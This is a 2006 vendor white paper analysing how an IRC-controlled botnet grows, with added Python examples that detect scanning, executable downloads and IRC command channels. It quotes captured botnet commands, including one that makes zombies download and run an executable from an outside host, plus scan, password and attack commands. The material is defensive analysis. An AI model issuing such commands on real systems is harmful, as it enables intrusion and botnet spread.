Dynamic Botnet Detection

Version 1.1

2006-06-13

Overview

The widespread adoption of broadband Internet connections has enabled the birth of a new threat against both service providers and the subscribers they serve. Botnets – vast networks of compromised PCs under the control of a single master – possess the ability to launch crippling denial of service attacks, send vast quantities of unsolicited e-mail messages, and infect thousands of vulnerable systems with privacy-violating spyware and other forms of malicious software.

By design, botnets are difficult to detect and even more challenging to stop as their dynamic and adaptive capabilities permit them to easily circumvent traditional means of detection and mitigation.

With the failure of port- and signature-based technologies, service providers are being forced to adopt new approaches in the effort to address this growing threat. By using botnets’ very nature as an indicator of their presence, behavior-based detection and mitigation approaches are vital weapons in the ongoing battle to clean up broadband networks.

In this paper, using a real-world example, we outline the birth of a typical botnet. While doing so, we explain the shortcomings of traditional approaches that rely on port and signature matches. This analysis is followed with an introduction to behavioral techniques that look for the telltale signs of botnet presence in order to trigger mitigation measures.

Botnets Exposed

A more complete understanding of how botnets operate is imperative in formulating and delivering effective protection mechanisms for providers and subscribers.

Bot and Exploit Selection

Botnets typically begin when an individual, who becomes known as a “botmaster”, downloads a bot program and exploit code. The botmaster need not be acting alone; in fact, criminal investigations have begun to link botnets with organized crime syndicates, so the problem is by no means isolated to a handful of individuals acting alone.

Bot programs such as AgoBot, SDBot, and IRCBot are freely available on the Internet, as is exploit code, making the creation of an armed bot a simple affair. Generally, exploits for Microsoft’s Windows operating systems are selected.

www.sandvine.com 2006-06-13

2 of 14

These exploits are attractive both due to the sheer number of security exploits available and the widespread adoption of Windows amongst business and residential users.

By simply plugging the exploit code into the ready-to-use bot software, the botmaster creates a weapon capable of infecting and assuming control of vulnerable systems, the vast majority of which will belong to unsuspecting residential broadband subscribers.

Residential subscribers have long been regarded as a weak link in network security, as a relatively small number of users possess the technical knowledge or threat awareness to attempt to secure their systems. With the continuing growth of broadband Internet connections, residential networks have quickly become a buffet for malware authors and distributors.

Control Plane

After selecting the bot and exploit combination, the botmaster must now set up one or more control planes. The most common technique is to use public IRC servers to control the botnet, although other options are certainly available. While investigating a distributed denial of service attack against the Million Dollar Homepage, we discovered that the control system was a hijacked web server issuing instructions to the attacking botnet through encrypted HTTP strings. Other frequently used control planes include HTTPS, SMTP, and proprietary protocols carried over UDP or TCP.

The botmaster needs a control plane in order to issue commands to and receive feedback from the botnet. By using this approach, it becomes a trivial matter to coordinate activities across thousands of distributed machines while keeping tabs on the status of the network itself.

Control planes are frequently moved to avoid detection; it is a trivial matter for the botmaster to direct the army to a different location.

Initial Infection and Army Expansion

The botmaster must now begin to build the zombie army that will comprise the botnet. Using the chosen exploit, the botmaster breaches and takes control over a handful of systems, as shown in Figure 1.

Figure 1 - Botmaster breaches initial targets

Once a machine is compromised, it immediately begins listening on the control plane for instructions. During the botnet’s infancy, systems are usually only instructed to automatically search for and penetrate additional machines.

Figure 2 - Zombies begin to infect other systems

Generally, regardless of the other activities in which a particular zombie PC is engaged, there is always the background activity of scanning for new “recruits”. Each system is capable of scanning thousands of IP addresses per minute, so even if only one PC in a hundred is vulnerable to a particular exploit, botnets can rapidly grow in size to number in the tens of thousands.

Each compromised system connects back to the control plane to await further instructions. At this stage, the botmaster has a single point of control over an army of broadband-connected PCs.

Figure 3 - Botnet is complete
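The recruitment scanning described above is exactly the kind of behaviour a provider can detect without knowing the exploit or the port in use. The following Python is an added example, not code from the Sandvine paper: it runs a fan-out check over flow records, flagging a source that contacts many distinct destinations on one port within a time window while most of its probes go unanswered. The flow records, thresholds and field names are assumptions constructed for illustration; the third sample host shows why fan-out alone is not enough (a peer-to-peer client has high fan-out too, but its connections are answered).

```python
"""Behavioral scan detection over constructed flow records.

Added example (not Sandvine's code). Flags a host as a scanner when, within
a sliding window, it contacts many distinct destinations on one port and most
probes are unanswered. Thresholds and sample flows are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float        # seconds since capture start
    src: str
    dst: str
    dport: int
    answered: bool   # True if the destination completed the TCP handshake


def sample_flows():
    """Constructed traffic: one zombie sweeping 192.0.2.0/24 on tcp/445, one
    normal web client, and one host with high fan-out whose connections are
    all answered (a peer-to-peer client), which must not be flagged."""
    flows = []
    # Zombie: 200 probes in 10 s, almost all unanswered (dead or patched hosts).
    for i in range(1, 201):
        flows.append(Flow(i * 0.05, "10.0.0.7", f"192.0.2.{i % 254 + 1}", 445,
                          answered=(i % 100 == 0)))
    # Normal client: a handful of web sessions to three servers.
    for i, dst in enumerate(["198.51.100.10", "198.51.100.11", "198.51.100.12"] * 2):
        flows.append(Flow(5.0 + i, "10.0.0.8", dst, 443, answered=True))
    # Chatty but legitimate: 60 distinct peers, every connection answered.
    for i in range(60):
        flows.append(Flow(20.0 + i * 0.5, "10.0.0.9", f"203.0.113.{i + 1}", 6881,
                          answered=True))
    return flows


def detect_scanners(flows, window=60.0, fanout=50, min_unanswered=0.8):
    """Return {src: (dport, distinct_destinations, unanswered_ratio)} for every
    source that, within `window` seconds, contacted at least `fanout` distinct
    destinations on one port with at least `min_unanswered` of the attempts
    unanswered. Port-agnostic: the sweep is recognised whatever dport it uses."""
    by_key = defaultdict(list)               # (src, dport) -> flows ordered by time
    for f in sorted(flows, key=lambda f: f.ts):
        by_key[(f.src, f.dport)].append(f)

    alerts = {}
    for (src, dport), fl in by_key.items():
        start = 0
        for end in range(len(fl)):
            while fl[end].ts - fl[start].ts > window:   # slide the window forward
                start += 1
            window_flows = fl[start:end + 1]
            distinct = {f.dst for f in window_flows}
            if len(distinct) < fanout:
                continue
            unanswered = sum(not f.answered for f in window_flows) / len(window_flows)
            if unanswered >= min_unanswered:
                alerts[src] = (dport, len(distinct), round(unanswered, 2))
                break                        # one alert per source/port is enough
    return alerts


if __name__ == "__main__":
    for src, (dport, n, ratio) in detect_scanners(sample_flows()).items():
        print(f"{src}: {n} distinct targets on tcp/{dport}, {ratio:.0%} unanswered")
```

In production the same logic would run per subscriber over NetFlow or packet summaries; the unanswered-probe ratio is what separates a sweep from a busy but legitimate host, and the window keeps a slow scanner from hiding behind a low per-second rate.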

Performing Updates

In addition to providing a convenient means of sending instructions to the army, the control plane also allows the botmaster to rapidly disseminate code and exploit updates - abilities that are paramount to any botnet remaining active.

There are a number of reasons for which a botmaster may need to update the botnet. It may be necessary to modify the bot code itself to avoid detection by devices applying signatures to packets and flows, or perhaps the botmaster desires to impart additional functionality to the army (new commands, new attack vectors, optimized scanning algorithms etc.).

In the example in Figure 4 below, the botmaster has used the control channel to instruct the bots to download new exploit code. This activity is commonplace, as Antivirus vendors rapidly create new signatures and users gradually patch their systems against particular attacks. By changing the exploit used to compromise systems, the botmaster can ensure that the army continues to grow despite the best efforts of the Antivirus community.

Figure 4 - Captured network trace of botnet update command

Frames 1, 2, 3, 4, 10 and 11 are the control channel and show the communication between the botmaster and the zombie PCs.

The command sent to the army instructs each zombie to download an exploit called “UB3R.exe” and then reload the bot process (on the compromised system) so that the exploit becomes active. The precise command issued to the army can be seen in Figure 5 to be:

.ft http://n0w.<domain>.fr/UB3R.exe c:\Reload.exe 1 -s

Figure 5 - Command to download and install a new exploit

Frames 5, 6, 7, 8, 9, 12, 13 and 14 in Figure 4 show the subscriber PC executing the botmaster’s command. The relevant HTTP level details extracted from the frames are shown in the figures below.

GET /UB3R.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible)
Host: n0w.xxx.fr

Figure 6 - HTTP GET request from zombie to server

HTTP/1.1 200 OK

Figure 7 - Server response to GET request

[Binary dump omitted: the ASCII rendering shows the “MZ” DOS header, the stub string “This program cannot be run in DOS mode.”, the “Rich” linker marker, the “PE” signature, and section names such as .text and .rdata.]

Figure 8 - Exploit being downloaded (binary data shown in ASCII format)
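The download in Figures 6 to 8 carries a browser-like User-Agent, a plain 200 OK, and a file name the botmaster can change at will, so neither the URL nor the headers are worth matching on. What cannot change is the shape of the payload: a Windows executable starts with the “MZ” DOS header and a “PE” signature at the offset stored at 0x3C. The Python below is an added example, not code from the paper: it classifies an HTTP response body by that structure alone and reads the section names from the COFF section table. The sample response and the header-only PE image are constructed for this example and are not a real program.

```python
"""Content-based detection of executable downloads (added example, not
Sandvine's code). Inspects the body for the MZ/PE structure instead of trusting
the URL extension or Content-Type. The sample PE image is constructed and
header-only; it is not a runnable program.
"""
import struct

# Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
COFF_HEADER = "<HHIIIHH"
# Name, VirtualSize, VirtualAddress, SizeOfRawData, PtrRawData, PtrRelocs, PtrLinenums,
# NumRelocs, NumLinenums, Characteristics
SECTION_HEADER = "<8sIIIIIIHHI"
IMAGE_FILE_DLL = 0x2000


def pe_summary(body: bytes):
    """Return None if `body` is not a PE image, else machine type, DLL flag and section names."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)          # offset of the PE signature
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from(COFF_HEADER, body, e_lfanew + 4)
    sect_off = e_lfanew + 24 + opt_size                          # section table follows the optional header
    sections = []
    for i in range(nsect):
        off = sect_off + 40 * i
        if off + 40 > len(body):
            break                                                # truncated download: report what is there
        (raw_name,) = struct.unpack_from("<8s", body, off)
        sections.append(raw_name.rstrip(b"\x00").decode("ascii", "replace"))
    return {"machine": machine, "is_dll": bool(chars & IMAGE_FILE_DLL), "sections": sections}


def inspect_http_response(raw: bytes):
    """Split an HTTP response into headers and body and classify the body by content.
    Returns the PE summary plus the (untrusted) Content-Type, or None for non-executables."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    headers = {}
    for line in head.split(b"\r\n")[1:]:                         # skip the status line
        k, _, v = line.partition(b":")
        headers[k.strip().lower()] = v.strip()
    summary = pe_summary(body)
    if summary is None:
        return None
    summary["claimed_content_type"] = headers.get(b"content-type", b"").decode("latin-1")
    return summary


def build_sample_pe():
    """Constructed PE32 header image: MZ stub, PE signature, COFF header, zeroed
    optional header and three section headers (.text, .rdata, .data)."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"This program cannot be run in DOS mode.\r\n$"
    dos = dos.ljust(e_lfanew, b"\x00")
    opt_size = 224                                               # PE32 optional header size
    coff = struct.pack(COFF_HEADER, 0x14C, 3, 0x44A5B027, 0, 0, opt_size, 0x010F)
    optional = struct.pack("<H", 0x10B).ljust(opt_size, b"\x00")  # 0x10B = PE32 magic
    sections = b"".join(
        struct.pack(SECTION_HEADER, name, vsize, vaddr, vsize, raw, 0, 0, 0, 0, flags)
        for name, vsize, vaddr, raw, flags in (
            (b".text", 0x2000, 0x1000, 0x400, 0x60000020),
            (b".rdata", 0x1000, 0x3000, 0x2400, 0x40000040),
            (b".data", 0x1000, 0x4000, 0x3400, 0xC0000040),
        )
    )
    return dos + b"PE\x00\x00" + coff + optional + sections


# Constructed response: the server lies about the type, the body is still a PE image.
SAMPLE_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" + build_sample_pe()


if __name__ == "__main__":
    print(inspect_http_response(SAMPLE_RESPONSE))
```

A check like this belongs behind the flow-level heuristics rather than on every byte of subscriber traffic; it is cheap to apply once a host has already been flagged for scanning or for talking to a suspected control channel.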

After restarting the bot process, the systems must reconnect to the control plane using the same exchange they used when they initially became part of the botnet. A conversation showing a zombie rejoining the botnet and receiving an initial set of commands is shown in Figure 9.

Figure 9 - Zombie joining the botnet and receiving first set of commands

Frames 1-12 contain the session establishment and the standard IRC overhead of a connection. The zombie in this capture joins an IRC channel called “UB3R”, the same name as the exploit downloaded only a few seconds previously.

Figure 10 shows the IRC command to join the botnet:

JOIN #UB3R

Figure 10 - IRC command to join the botnet channel

As stated previously, IRC is one of the most common means by which botmasters control botnets. IRC is attractive as a control plane because there are many IRC servers available on the Internet and because any command entered on a channel is broadcast to every zombie that has joined it.

Note that the botnet in this paper is not using the default IRC port (tcp/6667). Instead, it is bound to a non-standard port, tcp/4000. Consequently, commonly used approaches such as simple ACL and firewall policies that block the well-known IRC port will prove completely ineffective in stopping this botnet.
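Because the port tells you nothing, the practical approach is to recognise IRC by its grammar and then look for the bot-specific traits visible in Figures 5 and 9 to 13: commands prefixed with “.” or “#”, a link to a downloadable executable, and machine-generated nicknames. The Python below is an added example, not code from the Sandvine paper. It parses each session’s payload with the RFC 1459 line format, treats any session carrying well-formed IRC as IRC regardless of port, and then lists indicators. The three sample sessions (the first modelled on the tcp/4000 exchange described above), the bot-command verb list and the nickname pattern are assumptions constructed for illustration.

```python
"""Port-independent IRC command-and-control detection (added example, not
Sandvine's code). IRC is recognised by its line grammar, not by tcp/6667, and
sessions are then scored for bot traits. Sample sessions, the bot verb list
and the nickname template are assumptions.
"""
import re

# RFC 1459 line: [":" prefix SPACE] command {SPACE middle} [SPACE ":" trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<cmd>[A-Za-z]+|\d{3})"
    r"(?P<params>(?: [^:\s]\S*)*)(?: :(?P<trailing>.*))?$"
)
IRC_VERBS = {"NICK", "USER", "JOIN", "PART", "PRIVMSG", "NOTICE",
             "PING", "PONG", "MODE", "TOPIC", "QUIT"}
# Control verbs seen in common IRC bot families (assumed list for this example).
BOT_VERBS = {"ft", "auth", "login", "advscan", "scanall", "download", "update", "ddos"}
BOT_CMD = re.compile(r"^[.#!](?P<verb>\w+)(?:\s+(?P<args>.*))?$")
EXE_URL = re.compile(r"https?://\S+?\.(?:exe|dll|scr)\b", re.IGNORECASE)
# Nicknames built from a template such as [country|os|random] (assumed pattern).
TEMPLATED_NICK = re.compile(r"^\[[^\]|]*\|[^\]|]*\|\d+\]$")

# Constructed sessions keyed by (client, server, server port). The first mirrors
# the zombie's join-and-update exchange on tcp/4000 from the capture above.
SESSIONS = {
    ("10.0.0.7", "203.0.113.5", 4000): [
        "NICK [00|USA|12345]\r\n",
        "USER xyz 0 0 :xyz\r\n",
        ":irc.example 001 [00|USA|12345] :Welcome\r\n",
        "JOIN #UB3R\r\n",
        ":botmaster!u@h PRIVMSG #UB3R :.ft http://n0w.xxx.fr/UB3R.exe c:\\Reload.exe 1 -s\r\n",
        ":botmaster!u@h PRIVMSG #UB3R :#auth und3r -s\r\n",
        ":botmaster!u@h PRIVMSG #UB3R :#scanall -a -r -s\r\n",
    ],
    # A TLS ClientHello on tcp/443: binary, not IRC.
    ("10.0.0.8", "198.51.100.2", 443): ["\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"],
    # Ordinary IRC on the default port: IRC, but no bot indicators.
    ("10.0.0.8", "198.51.100.9", 6667): [
        "NICK alice\r\n",
        "USER alice 0 * :Alice\r\n",
        "JOIN #python\r\n",
        ":bob!u@h PRIVMSG #python :hi all\r\n",
    ],
}


def parse_irc(line):
    """Parse one line into (command, params, trailing), or None if it is not IRC."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    cmd = m.group("cmd").upper()
    if cmd not in IRC_VERBS and not cmd.isdigit():   # numeric replies such as 001
        return None
    return cmd, m.group("params").split(), m.group("trailing")


def classify_session(dport, payload_lines, min_irc_lines=3):
    """Decide whether a session is IRC (by grammar, not port) and list bot indicators."""
    parsed = [p for p in map(parse_irc, payload_lines) if p is not None]
    if len(parsed) < min_irc_lines:
        return {"irc": False, "port": dport, "indicators": []}
    indicators = []
    if dport != 6667:
        indicators.append(f"irc on non-standard port {dport}")
    for cmd, params, trailing in parsed:
        if cmd == "NICK" and params and TEMPLATED_NICK.match(params[0]):
            indicators.append(f"templated nick {params[0]}")
        if cmd == "PRIVMSG" and trailing:
            bot = BOT_CMD.match(trailing)
            if bot and bot.group("verb").lower() in BOT_VERBS:
                indicators.append(f"bot command {bot.group('verb')}")
            for url in EXE_URL.findall(trailing):
                indicators.append(f"executable download {url}")
    return {"irc": True, "port": dport, "indicators": indicators}


def classify_all(sessions):
    """Classify every (client, server, port) session in `sessions`."""
    return {key: classify_session(key[2], lines) for key, lines in sessions.items()}


if __name__ == "__main__":
    for key, verdict in classify_all(SESSIONS).items():
        print(key, verdict)
```

The verb list will need tending as bot families change, which is the same maintenance burden a signature has; the durable part is the first step, recognising the protocol from its structure so that moving from tcp/4000 to another port buys the botmaster nothing.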

Attacks

Once an army is established, the botmaster can begin to carry out attacks. An attack can be as prominent as using the combined might of the army to knock a particular website offline, or as subtle as installing spyware or spam Trojans on compromised machines.

In this particular instance, the botmaster has elected to compromise additional machines using an older buffer overflow in Microsoft’s ASN.1 library (MS04-007), reached over HTTP through IIS and referred to in the bot’s command set as ASN1HTTP.

The attack itself is begun with the zombies receiving an instruction to execute an “advanced scan” to look for servers vulnerable to the ASN1HTTP attack. The actual command, shown in Figure 11, is:

#advscan asn1http 125 5 999 128.x.x.x -r

Figure 11 - Command to scan for exploitable systems

The botmaster then authenticates to the zombies with a password. Requiring such authentication is a common way to prevent anyone who stumbles upon the control channel from taking over or interfering with the botnet. The password command is:

#auth und3r -s

Figure 12 - Authorization command

Finally, the command to begin the search and attack is transmitted:

#scanall -a -r -s

Figure 13 - Command to start attack

The zombies begin scanning and exploiting any vulnerable targets found.

By looking at the timestamps in Figure 14, we can see that it only takes approximately two seconds to complete the exploit of a vulnerable target.

Figure 14 - Target is found and attack is completed

In the figure below, we look into a frame to see the buffer overflow attack.

Figure 15 - Buffer overflow attack

Each time a system is exploited, the IP address of the target is transmitted back to the botmaster through the IRC channel.

Figure 16 - Zombie reports back to botmaster

The ultimate objective of the botmaster is not known; however, with the increase in phishing scams it is plausible that the botmaster wants to seize control over well-connected servers in order to host scam websites.

It is also not uncommon for botmasters to simply compile lists of exploited systems in order to sell or rent out the network to third-parties (for use in denial of service attacks, spam networks, or a host of other malicious activities).

Implications for Service Providers

During the attack examined in this paper, a single zombie was able to successfully exploit 206 systems in 188 seconds, a rate of slightly more than one infected host per second. Considering the fact that a typical botnet numbers in the thousands, it is easy to see the concern these botnets can cause network service providers.

Even if a particular botnet only has control over a few hundred residential systems on a particular POP on a provider network, the combined might of these systems using their bandwidth to launch a denial of service attack against an external target can easily cripple the POP, causing service disruptions for thousands of subscribers. These subscribers will often turn to the provider’s help desk for support, even if they themselves are participating in the attack, however unknowingly.

Furthermore, attacks and huge volumes of spam sourced from a particular provider cause that provider to be perceived as a source of malicious traffic, which can result in having their address space blocked by other providers either directly or via the many blacklists available on the Internet.

Finding the Botmaster

Locating the botmaster is generally extremely challenging. In order to evade detection, zombies almost always connect to control channels that are not owned by the botmaster. Often, these are public IRC servers or private servers that have been hijacked for use in the botnet. Adding to the complexity is the fact that the botmaster typically proxies the control session through a number of compromised machines that are distributed across numerous networks and providers, as shown in Figure 17.

Figure 17 - Typical path to botmaster

These proxy connections are changed with relative frequency, so attempts to trace back to the source are usually unsuccessful, and the control plane itself is routinely moved with a single command.

Connections established through “onion routing” such as the Tor network further compound the problem faced by network forensic and tracking operations.

As a consequence of all these evasive techniques, successfully determining the botmaster’s identity requires an immense amount of cooperation and efficient coordination across service providers, private sector companies, law enforcement personnel, and technical experts, not to mention a good deal of luck.

Limitations of Traditional Techniques

Detecting and mitigating botnets is not a trivial matter, as botnets are a dynamic and ever-evolving threat. The rapid update capability allows botmasters to continually modify the zombie code (choose a different exploit, pad the code with “filler”), the control channel, and the compromised devices that relay the control channel, rapidly rendering static signatures largely ineffective.

Furthermore, “port hopping” defeats simple port blocks. In the example considered in this paper, blocking tcp/4000 would simply cause the botnet to move to a different port within a few minutes. The converse problem is a control plane that hides on a well-known port: a control channel using tcp/80 or tcp/443 cannot be blocked without also stopping the widely used HTTP and HTTPS protocols.

Conclusions

Botnets, although quite simple in design, are effective attack tools. They provide massive amounts of bandwidth to an individual, provide cover from tracking the botmaster, and are easily capable of evading static signature and port-based blocking measures.

Intelligent techniques that rely on behavioral analysis offer the only effective means of detecting and defending against the proliferation of botnets. Bots, much like worms, behave in a predictable manner: scanning for new hosts to infect, transmitting payloads to target machines, and engaging in attacks. By detecting these activities and evaluating them against policy heuristics, as was done in the example considered herein, it is possible to identify bots and implement policies to mitigate the further spread of infection.

In this manner, providers can eliminate vast sources of spam and damaging DoS attacks, while protecting end subscribers from the invasion of privacy and consumption of system resources attributable to a bot hijacking.

If you are interested in learning more about Sandvine Intelligent Broadband Network products and services, please contact us at [email protected].

Sandvine Incorporated, Waterloo, Ontario, Canada. Phone: +1 519 880 2600, Fax: +1 519 884 9892
Sandvine Limited, Basingstoke, U.K. Phone: +44 (0) 1256 698021, Fax: +44 (0) 1256 698245
http://www.sandvine.com • email: [email protected]